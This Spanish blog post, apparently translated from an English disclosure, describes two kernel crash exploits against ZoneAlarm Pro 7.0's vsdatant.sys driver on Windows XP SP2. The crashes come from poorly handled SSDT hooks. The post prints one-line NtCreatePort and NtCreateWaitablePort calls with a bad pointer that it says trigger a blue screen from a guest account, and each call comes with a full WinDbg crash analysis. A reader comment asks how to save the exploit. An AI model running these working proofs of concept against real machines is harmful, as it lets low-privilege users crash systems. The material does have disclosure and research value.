18
Jun
Exploit para Zone Alarm
El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí
El post original esta en ingles aquí
ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000
Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)
Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.
Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46
NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.
Prototipo de la Función
NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);
Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.
NtCreatePort(nil, pointer($81234567), 0, 0, 0);
Y aquí esta el analisis de este BSOD
Originally posted by windbg
kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
FAULTING_MODULE: 804d7000 nt
DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1
READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f
FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]
MM_INTERNAL_CODE: 0
CUSTOMER_CRASH_COUNT: 4
DEFAULT_BUCKET_ID: WRONG_SYMBOLS
BUGCHECK_STR: 0x50
LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10
STACK_COMMAND: kb
FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: vsdatant+33256
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: vsdatant
IMAGE_NAME: vsdatant.sys
BUCKET_ID: WRONG_SYMBOLS
Followup: MachineOwner
---------
Otro exploit con la misma técnica para el mismo firewall.
Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56
NtCreateWaitablePort es otra función ganchada por el driver.
Function prototype
NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.
NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);
Esto lleva inmediatamente a un BSOD
analisis en windbg
kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
FAULTING_MODULE: 804d7000 nt
DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1
READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f
FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]
MM_INTERNAL_CODE: 0
CUSTOMER_CRASH_COUNT: 5
DEFAULT_BUCKET_ID: WRONG_SYMBOLS
BUGCHECK_STR: 0x50
LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc
STACK_COMMAND: kb
FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: vsdatant+33336
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: vsdatant
IMAGE_NAME: vsdatant.sys
BUCKET_ID: WRONG_SYMBOLS
Followup: MachineOwner
---------
Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.
Saludos
EP_X0FF/UG North
anonimo dijo:
hola:::
e q extencion se guarda el xploit
saludos